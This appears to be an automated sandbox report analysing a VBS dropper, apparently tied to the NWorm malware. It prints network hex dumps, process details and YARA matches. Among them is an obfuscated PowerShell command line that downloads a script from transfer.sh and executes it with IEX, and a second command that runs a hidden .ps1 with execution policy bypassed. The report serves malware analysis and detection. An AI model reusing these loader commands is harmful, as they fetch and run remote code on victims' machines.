2022-03-08 19:26:26 UTC	32	IN	Data Raw: 27 34 45 27 27 32 44 27 27 35 37 27 27 33 27 27 27 37 32 27 27 36 44 27 27 33 38 27 27 33 38 27 27 33 39 27 27 33 31 27 27 32 45 27 27 36 35 27 27 37 38 27 27 36 35 27 27 27 27 27 27 27 27 27 27 33 34 27 27 27 38 27 27 27 31 27 27 35 27 27 27 37 32 27 27 36 46 27 27 36 34 27 27 37 35 27 27 36 33 27 27 37 34 27 27 35 36 27 27 36 35 27 27 37 32 27 27 37 33 27 27 36 39 27 27 36 46 27 27 36 45 27 27 27 27 27 27 33 27 27 27 32 45 27 27 33 27 27 27 32 45 27 27 33 27 27 27 32 45 27 27 33 27 27 27 27 27 27 27 33 38 27 27 27 38 27 27 27 31 27 27 34 31 27 27 37 33 27 27 37 33 27 27 36 35 27 27 36 44 27 27 36 32 27 27 36 43 27 27 37 39 27 27 32 27 27 27 35 36 27 27 36 35 27 27 37 32 27 27 37 33 27 27 36 39 27 27 36 46 27 27 36 45 27 27 27 27 27 27 33 27 27 27 32 45 Data Ascii: '4E''2D''57''3'''72''6D''38''38''39''31''2E''65''78''65''''''''''34'''8'''1''5'''72''6F''64''75''63''74''56''65''72''73''69''6F''6E''''''3'''2E''3'''2E''3'''2E''3'''''''38'''8'''1''41''73''73''65''6D''62''6C''79''2'''56''65''72''73''69''6F''6E''''''3'''2E
2022-03-08 19:26:26 UTC	48	IN	Data Raw: 27 27 27 34 37 45 32 33 27 27 27 27 27 34 32 38 32 41 27 27 27 27 27 41 32 38 27 35 27 27 27 27 27 36 37 45 32 34 27 27 27 27 27 34 37 45 32 35 27 27 27 27 27 34 37 45 32 36 27 27 27 27 27 34 32 38 32 42 27 27 27 27 27 41 32 38 27 35 27 27 27 27 27 36 32 38 27 39 27 27 27 27 32 42 38 27 33 38 27 27 27 27 27 34 32 27 46 44 39 27 27 32 27 27 32 27 31 43 31 35 27 37 27 27 35 39 32 27 45 37 37 42 46 42 46 46 33 42 44 41 46 37 46 46 46 46 33 38 36 36 46 38 46 46 46 46 32 27 44 43 27 31 27 27 27 27 32 38 35 44 27 27 27 27 27 36 38 27 31 31 27 27 27 27 27 34 31 37 33 41 38 27 46 46 46 46 46 46 33 38 39 27 46 44 46 46 46 46 37 45 32 42 27 27 27 27 27 34 32 38 27 35 27 27 27 27 27 36 37 45 32 43 27 27 27 27 27 34 37 45 32 44 27 27 27 27 27 34 32 38 32 41 27 27 27 Data Ascii: '''47E23'''''4282A'''''A28'5'''''67E24'''''47E25'''''47E26'''''4282B'''''A28'5'''''628'9''''2B8'38'''''42'FD9''2''2'1C15'7''592'E77BFBFF3BDAF7FFFF3866F8FFFF2'DC'1''''285D'''''68'11'''''4173A8'FFFFFF389'FDFFFF7E2B'''''428'5'''''67E2C'''''47E2D'''''4282A'''
2022-03-08 19:26:26 UTC	64	IN	Data Raw: 27 27 46 45 27 43 31 37 27 27 39 43 32 27 36 27 27 27 27 27 27 27 32 27 31 45 27 27 27 27 27 27 35 38 46 45 27 45 31 37 27 27 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 46 45 27 43 31 37 27 27 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 37 38 27 27 27 27 27 27 32 27 35 27 27 27 27 27 27 27 35 38 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 38 38 27 27 27 27 27 27 32 27 32 44 27 27 27 27 27 27 35 39 39 43 46 45 27 43 31 36 27 27 32 27 31 39 27 27 27 27 27 27 32 27 41 39 27 27 27 27 27 27 32 27 32 38 27 27 27 27 27 27 35 38 39 43 32 27 33 45 27 27 27 27 27 27 32 27 31 44 27 27 27 27 27 27 35 38 46 45 27 45 31 37 27 27 46 45 27 43 31 36 27 27 32 27 31 41 27 27 27 27 27 27 46 45 27 43 31 37 27 27 39 43 46 Data Ascii: ''FE'C17''9C2'6'''''''2'1E''''''58FE'E17''FE'C16''2'19''''''FE'C17''9CFE'C16''2'19''''''2'78''''''2'5'''''''589CFE'C16''2'19''''''2'88''''''2'2D''''''599CFE'C16''2'19''''''2'A9''''''2'28''''''589C2'3E''''''2'1D''''''58FE'E17''FE'C16''2'1A''''''FE'C17''9CF
2022-03-08 19:26:26 UTC	80	IN	Data Raw: 27 42 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 32 27 27 32 27 27 27 27 27 27 32 27 27 36 27 27 27 27 27 27 35 38 39 43 32 27 46 42 27 27 27 27 27 27 32 27 35 33 27 27 27 27 27 27 35 39 46 45 27 45 27 34 27 27 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 43 27 27 27 27 27 27 32 27 42 34 27 27 27 27 27 27 32 27 34 46 27 27 27 27 27 27 35 39 39 43 32 27 36 32 27 27 27 27 27 27 32 27 34 41 27 27 27 27 27 27 35 38 46 45 27 45 27 34 27 27 46 45 27 43 27 27 27 27 32 27 27 44 27 27 27 27 27 27 46 45 27 43 27 34 27 27 39 43 46 45 27 43 27 27 27 27 32 27 27 44 27 27 27 27 27 27 32 27 44 34 27 27 27 27 27 27 32 27 34 36 27 27 27 27 27 Data Ascii: 'B''''''FE'C'4''9CFE'C''''2''C''''''2''2''''''2''6''''''589C2'FB''''''2'53''''''59FE'E'4''FE'C''''2''C''''''FE'C'4''9CFE'C''''2''C''''''2'B4''''''2'4F''''''599C2'62''''''2'4A''''''58FE'E'4''FE'C''''2''D''''''FE'C'4''9CFE'C''''2''D''''''2'D4''''''2'46'''''
2022-03-08 19:26:26 UTC	96	IN	Data Raw: 27 31 27 27 27 27 37 27 27 32 27 27 27 27 34 35 27 27 33 44 27 27 32 39 27 27 27 33 27 31 27 27 27 27 38 33 27 32 27 27 27 27 34 35 27 27 33 44 27 27 32 45 27 27 27 33 27 31 27 27 27 27 39 36 27 32 27 27 27 27 34 35 27 27 33 44 27 27 33 33 27 27 27 33 27 31 27 27 27 27 41 39 27 32 27 27 27 27 34 35 27 27 33 44 27 27 33 38 27 27 27 42 27 31 31 27 27 27 42 43 27 32 27 27 27 27 34 39 27 27 33 44 27 27 33 44 27 27 27 42 27 31 31 27 27 27 44 39 27 32 27 27 27 27 34 39 27 27 34 31 27 27 33 44 27 27 27 27 27 31 27 27 27 27 45 43 27 32 27 27 27 27 34 31 27 27 34 41 27 27 33 44 27 27 31 33 27 31 27 27 27 27 27 42 27 33 27 27 27 27 34 39 27 27 34 42 27 27 33 45 27 27 27 27 27 27 27 27 27 27 32 38 27 33 27 27 27 27 34 31 27 27 34 42 27 27 33 45 27 27 27 27 27 27 27 Data Ascii: '1''''7''2''''45''3D''29'''3'1''''83'2''''45''3D''2E'''3'1''''96'2''''45''3D''33'''3'1''''A9'2''''45''3D''38'''B'11'''BC'2''''49''3D''3D'''B'11'''D9'2''''49''41''3D'''''1''''EC'2''''41''4A''3D''13'1'''''B'3''''49''4B''3E''''''''''28'3''''41''4B''3E'''''''
2022-03-08 19:26:26 UTC	112	IN	Data Raw: 27 27 34 36 35 36 33 31 37 32 34 39 33 34 36 36 36 46 35 35 33 31 27 27 36 32 34 39 36 37 37 32 34 33 35 39 35 33 36 31 35 34 36 37 27 27 36 45 36 34 35 35 37 32 35 38 33 33 33 34 34 35 37 32 33 32 27 27 34 42 35 31 34 44 37 32 35 39 35 34 35 37 33 36 33 34 36 41 27 27 34 31 37 33 37 33 36 35 36 44 36 32 36 43 37 39 27 27 35 31 35 34 34 44 37 32 35 34 36 39 37 32 35 33 37 33 35 34 27 27 35 32 35 33 34 31 34 33 37 32 37 39 37 27 37 34 36 46 35 33 36 35 37 32 37 36 36 39 36 33 36 35 35 27 37 32 36 46 37 36 36 39 36 34 36 35 37 32 27 27 37 34 37 37 35 32 37 32 37 38 36 44 33 38 34 46 36 37 34 38 27 27 35 35 34 36 36 31 37 32 35 27 36 35 37 38 35 38 34 32 35 39 27 27 36 37 36 35 37 34 35 46 34 31 37 33 37 33 36 35 36 44 36 32 36 43 37 39 27 27 37 33 36 35 37 Data Ascii: ''465631724934666F5531''62496772435953615467''6E645572583334457232''4B514D7259545736346A''417373656D626C79''51544D72546972537354''5253414372797'746F536572766963655'726F7669646572''74775272786D384F6748''554661725'6578584259''6765745F417373656D626C79''73657
2022-03-08 19:26:26 UTC	128	IN	Data Raw: 27 27 37 34 27 27 37 32 27 27 36 39 27 27 36 45 27 27 36 37 27 27 34 36 27 27 36 39 27 27 36 43 27 27 36 35 27 27 34 39 27 27 36 45 27 27 36 36 27 27 36 46 27 27 27 27 27 27 32 34 27 32 27 27 27 27 27 31 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 27 27 27 33 34 27 27 36 32 27 27 33 27 27 27 27 27 27 27 33 43 27 27 27 45 27 27 27 31 27 27 34 33 27 27 36 46 27 27 36 44 27 27 37 27 27 27 36 31 27 27 36 45 27 27 37 39 27 27 34 45 27 27 36 31 27 27 36 44 27 27 36 35 27 27 27 27 27 27 27 27 27 27 34 33 27 27 36 43 27 27 36 31 27 27 37 33 27 27 37 33 27 27 34 43 27 27 36 39 27 27 36 32 27 27 37 32 27 27 36 31 27 27 37 32 27 27 37 39 27 27 33 31 27 27 27 27 27 27 34 34 27 27 27 45 27 27 27 31 27 27 34 36 27 27 36 39 27 27 36 43 27 27 36 35 27 27 34 Data Ascii: ''74''72''69''6E''67''46''69''6C''65''49''6E''66''6F''''''24'2'''''1''3'''3'''3'''3'''3'''34''62''3'''''''3C'''E'''1''43''6F''6D''7'''61''6E''79''4E''61''6D''65''''''''''43''6C''61''73''73''4C''69''62''72''61''72''79''31''''''44'''E'''1''46''69''6C''65''4

Target ID:	0
Start time:	20:26:13
Start date:	08/03/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\YBAXAKQXVYWIXQJDE.VBS"
Imagebase:	0x7ff744810000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	2
Start time:	20:26:15
Start date:	08/03/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_o)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_a)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_d)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),'67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-s67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-t67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-r67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-i67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-n67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-g67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2)974\{+@-$$-)53(86+99+558]9[@7]911\1#1&}89#-)[#3#\4{0/52[2&4&#7%)46(}55$15]-',''),'%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/<1+=62}91=8^-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_e)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_b)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_C)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_l)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_i)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_e)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_n)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_t)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_t)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_.W)/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7(*(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7((){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1^$20<%_$-}2^)</\7(*(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')\|I`E`X
Imagebase:	0x7ff619710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.945992351.000001EE646CA000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.953420708.000001EE7C619000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.947928671.000001EE64A74000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.951681461.000001EE654E3000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.951692197.000001EE654E7000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.952998329.000001EE745BD000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000002.00000002.952538142.000001EE74334000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	high

Show Windows behavior

Target ID:	4
Start time:	20:26:15
Start date:	08/03/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff77f440000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	20:26:50
Start date:	08/03/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
Imagebase:	0x7ff619710000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000A.00000002.943052838.000001A63E9D0000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000A.00000002.944900247.000001A640AD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Target ID:	11
Start time:	20:27:05
Start date:	08/03/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0xe20000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.526861512.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527798017.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527148888.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000002.942336968.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_NWorm, Description: Yara detected NWorm, Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000B.00000000.527508335.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate

Show Windows behavior

Function 00007FF9ECF40C4D Relevance: 8.0, Strings: 6, Instructions: 479COMMON

Download Yara Rule

Strings

gRK, xrefs: 00007FF9ECF40DE8
@6-t, xrefs: 00007FF9ECF40FAC
gRK, xrefs: 00007FF9ECF40D9D
gRK, xrefs: 00007FF9ECF40E80
gRK, xrefs: 00007FF9ECF40DC1
86-t, xrefs: 00007FF9ECF40E02

Memory Dump Source

Source File: 00000002.00000002.955148529.00007FF9ECF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff9ecf40000_powershell.jbxd

Similarity

API ID:
String ID: 86-t$@6-t$gRK$gRK$gRK$gRK
API String ID: 0-2060218735
Opcode ID: 7c7df6a06e1921498d25adec3af2cd433187605c6b8b867ed5b43e3b5f85a4c2
Instruction ID: 54b9346c1f43c778f00e1c5c11b3d1ab492b63eeed17e92cfa4d3f4171b74eb8
Opcode Fuzzy Hash: 7c7df6a06e1921498d25adec3af2cd433187605c6b8b867ed5b43e3b5f85a4c2
Instruction Fuzzy Hash: 41E1F43290DB866FE79A972A58557F47FE1EF46220B0804FAD09DC71E3DD68AC09C352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9ECF40DCD Relevance: 3.9, Strings: 3, Instructions: 116COMMON

Download Yara Rule

Strings

gRK, xrefs: 00007FF9ECF40DE8
gRK, xrefs: 00007FF9ECF40E80
86-t, xrefs: 00007FF9ECF40E02

Memory Dump Source

Source File: 00000002.00000002.955148529.00007FF9ECF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff9ecf40000_powershell.jbxd

Similarity

API ID:
String ID: 86-t$gRK$gRK
API String ID: 0-1583634640
Opcode ID: 13eaf976a2096642fd8a1f80571e6df54af92669bcf8acb3f41a1f90c1783eab
Instruction ID: ea4a5da4d0b39e576f9e582de29898123c257b27d841fff7ffabcbcd430ed321
Opcode Fuzzy Hash: 13eaf976a2096642fd8a1f80571e6df54af92669bcf8acb3f41a1f90c1783eab
Instruction Fuzzy Hash: 64315532E0EA862BF7A9E32A14157F469C2EF81710B4844FED48DC32E3DC6DBC158256

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF9ECE753F1 Relevance: 3.0, Strings: 2, Instructions: 534COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF9ECE75689
h, xrefs: 00007FF9ECE755B6

Memory Dump Source

Source File: 00000002.00000002.954565283.00007FF9ECE70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff9ece70000_powershell.jbxd

Similarity

API ID:
String ID: H$h
API String ID: 0-3056009747
Opcode ID: 57c402642334c5f861797b742fbcf58ff738c5ee16954bd19052cd4855d676ce
Instruction ID: 31761e80b6564cc0ba7c2aa9ab8f0f1a8673cd8b2eab54f349aa4cbe0c651e43
Opcode Fuzzy Hash: 57c402642334c5f861797b742fbcf58ff738c5ee16954bd19052cd4855d676ce
